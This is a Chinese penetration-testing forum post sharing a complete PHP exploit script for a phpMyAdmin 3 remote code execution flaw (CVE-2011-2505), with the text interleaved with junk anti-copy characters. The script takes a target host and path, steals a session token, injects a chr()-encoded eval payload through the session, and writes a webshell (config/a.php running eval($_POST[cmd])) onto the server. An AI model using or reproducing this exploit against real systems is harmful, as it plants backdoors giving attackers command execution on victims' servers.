中国网络渗透测试联盟
标题:
phpadmin3 remote code execute php版本exploit
[打印本页]
作者:
admin
时间:
2013-2-21 09:13
标题:
phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
; Y6 T1 l5 ?; _4 ^1 l
/ Q- \* }! Z9 i0 D; u
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
# u: f1 n. X+ N: |6 U5 n. m
: S, `3 S1 c u1 i8 g. n: t
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
: w( {- a9 \" W0 V# ?
一是session.auto_start = 1;
' r' n# Z. N" W. k2 [2 @* x- J
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
" {* A' z% n! T P6 I3 [* L; `& I
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
) ~5 F a5 Z h7 `0 i# d. {3 r
+ h! e& f- N9 w1 x
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
! V8 R) S- {4 W# ?* x
+ I$ @5 S3 A. D% Z( _
于是写了这个php版本的exp,代码如下:
' r [7 E4 Y( C. i
4 ^( `: w% e$ l! \
#!/usr/bin/php
& W/ K6 b& t; O! W7 C
<?php
0 w9 V4 I, |& x- d
print_r('
6 o* i8 k. R) U$ U" t9 w0 k
+---------------------------------------------------------------------------+
8 u/ w: E1 ], Q5 s2 K
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
. {( k! v, C5 H, m5 x
by oldjun(
www.oldjun.com
)
4 [9 _# K2 I9 {: C l% A) A
welcome to
www.t00ls.net
) u4 I0 Q% K* H( z, G
mail:
oldjun@gmail.com
, s6 |1 ?4 f2 Y1 ]6 M! j
Assigned CVE id: CVE-2011-2505
, X2 H* @4 q7 j; [
+---------------------------------------------------------------------------+
4 ]5 r ^2 g& ]( B
');
- {4 J: k" L0 q$ |( A5 z
0 [" |- Y3 l0 p: s3 c
/**
& v2 ` ]& Y( ? N$ |& E
* working when the directory:"config" exists and is writeable.
& t/ l. a; U3 X4 k
**/
5 G8 \6 u! {" t* M; c3 J
( ]- Y2 b [) q9 Q( M
if ($argc < 3) {
6 S1 u) z9 T3 L9 g3 m
print_r('
2 G3 h& ?2 Z. w' l6 c b
+---------------------------------------------------------------------------+
! k6 l0 L/ k9 h8 R
Usage: php '.$argv[0].' host path
7 F) m! Z0 Q. m I' L. {. T
host: target server (ip/hostname)
7 l6 G! n: t: P$ q) z
path: path to pma3
5 _9 s; q7 K; E
Example:
! {' u3 q$ k: c. R2 v& |& M# c
php '.$argv[0].' localhost /pma/
# V" h3 F* ?. q4 L8 z
+---------------------------------------------------------------------------+
7 c/ B5 L8 L) @
');
, Y% ?5 P! T/ h2 [- K/ t
exit;
3 A, I' n% t8 t$ U7 p
}
. x+ K. s% a/ `# r
& V9 T& |6 V: I: J; h9 C% |
$host = $argv[1];
% M; n( m1 ^- b
$path = $argv[2];
9 @; T2 B: o! Y: [7 J, b! H
, s! A/ U: f( }' M u
/**
1 u4 e* ^7 t5 M5 s) E2 f
* Try to determine if the directory:"config" exists
2 {" K, \0 h6 x- ?4 P6 }! J U
**/
+ Q6 |& v3 r3 m6 `& q
echo "[+] Try to determine if the directory:config exists....\n";
- J+ S! F* H M& O+ L
$returnstr=php_request('config/');
, {* M$ m9 n+ p
if(strpos($returnstr,'404')){
f' ]# l& w4 o7 f/ x8 g; q* r
exit("[-] Exploit Failed! The directory:config do not exists!\n");
7 h. f N' v% _ ?+ s! Y3 M: f
}
" f6 ?4 P- z! E
: a2 W4 @5 A0 G% y, v
/**
9 ?$ U1 ^# y$ i3 |
* Try to get token and sessionid
9 J: j0 E! l; r4 Z' T+ r% I
**/
; V- T& [8 @2 }3 L* s4 N8 v
echo "[+] Try to get token and sessionid....\n";
3 x7 A" U) [6 l8 u* @
$result=php_request('index.php');
7 ~1 v, s& h2 J" ~
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
& [. g/ h9 d- ^% k, A
$token=$resp[3];
% w: t; V: [( [& l) }* z
$sessionid=$resp[1];
' `) S0 `5 ]1 K
if($token && $sessionid){
8 e5 ~+ V8 P4 Q3 N: N1 Z7 s5 a
echo "[+] token
token\n";
9 l9 \- J: F3 m7 c7 B6 D2 P9 I
echo "[+] Session ID
sessionid\n";
9 K, T9 `. m B+ @2 q S
}else{
0 f! W- @) o+ r) ^+ T) m
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
( V1 z0 w/ Q+ R. u, Z( h' f
}
6 s, r1 H" X+ O& V* `3 U5 @+ G) n
7 ]+ J3 `# b9 x# D& Q- W2 h5 m, [
/**
3 Q% G% L7 q- R! o, {" ]
* Try to insert shell into session
' D* {( M/ S. T
**/
) E8 Y; M& U! K4 O0 f
echo "[+] Try to insert shell into session....\n";
: Q' B% k( d1 [0 f& [$ C
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
: q8 W- V& \* i) m5 R ?
8 G$ P. J/ N/ h, y% A
/**
$ h# B9 K8 ]% G9 I
* Try to create webshell
4 M' g, A: u: g6 e
**/
- ^4 N8 T* x& K/ \/ h# x$ z
echo "[+] Try to create webshell....\n";
; m* L2 I4 g: A4 t7 W @
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
2 i& w# p: x, D' _0 g+ L c+ W
/**
) @/ D1 o2 s- v8 G2 ?7 Q
* Try to check if the webshell was created successfully
* d8 f% Z8 n' m6 | j
**/
5 m- `4 u5 e4 s8 W4 g- ?, {
echo "[+] Try to check if the webshell was created successfully....\n";
6 a( ~: ^3 K' W7 d
$content=php_request('config/config.inc.php');
& }2 P) v, g7 `3 n' v3 U
if(strpos($content,'t00ls')){
! j) B$ E3 H2 D, G, d# K/ y/ d9 H
echo "[+] Congratulations! Expoilt successfully....\n";
7 Y s- h! z5 b j8 V3 b/ \3 U
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
4 b+ B4 A0 V2 p* W: S0 b" Y/ o
}else{
+ n* E0 `% H6 x9 s5 E
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
3 D q6 R2 f4 S# s+ K9 h: w
}
% z/ p2 J4 a9 ?8 [
s0 o8 h* t# ^$ F
function php_request($url,$data='',$cookie=''){
! h. R- e3 T/ \! y
global $host, $path;
& o* i+ ]% H, R, t* Q1 [ k
4 m- T* f" O8 `) V
$method=$data?'POST':'GET';
/ u" C K* o5 Y% i: m
2 N) ^7 ]2 t1 r
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
, `+ D4 _0 f, v. U: o# ~% k
$packet .= "Accept: */*\r\n";
$ r* d4 U" z, f4 o' h* y7 S
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
. Y4 c7 r% ?4 a8 m* A7 q: B+ B; b- u
$packet .= "Host: $host\r\n";
3 @; h" R% i: q: I* j) v. ~+ B% b
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
, U( v# W9 G3 w8 h# N& t+ p
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
: L3 N6 N: s0 s' J J$ B
$packet .= $cookie?"Cookie: $cookie\r\n":"";
) `; V% C. N3 v [7 L/ c
$packet .= "Connection: Close\r\n\r\n";
5 ]% c$ M) @+ y8 C5 R9 a
$packet .= $data?$data:"";
3 a6 T' h% T5 Z: U
! q* K+ n n2 W7 X9 \# ?
$fp = fsockopen(gethostbyname($host), 80);
6 L$ @ ]5 u" Q7 P$ Z/ }* j
if (!$fp) {
0 h& }0 p' c9 y' |; j0 p
echo 'No response from '.$host; die;
( `; R* l i& i# \) d( X8 q
}
2 X; M# n) `5 J. q
fputs($fp, $packet);
# R+ j+ f# x+ i3 v: \9 R' \4 J% x
# s9 i+ n9 j( s G& i
$resp = '';
, [" _0 e4 b4 D% W; F! E0 F. ]8 X. w
6 g6 c6 X* m( x9 ~. R6 Q+ `! c
while ($fp && !feof($fp))
9 N6 p H# O( P! T2 \
$resp .= fread($fp, 1024);
9 o2 _2 G6 F& v: }1 H2 F& \
4 r o- j: }6 H i1 I G/ N
return $resp;
: d T$ N2 S1 r5 g [6 L
}
2 q6 N" _7 B+ N! v& [- h- m' g! E
+ D0 P9 k' t1 N/ w6 j. f
?>
`4 x7 r% [. C2 r
.
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2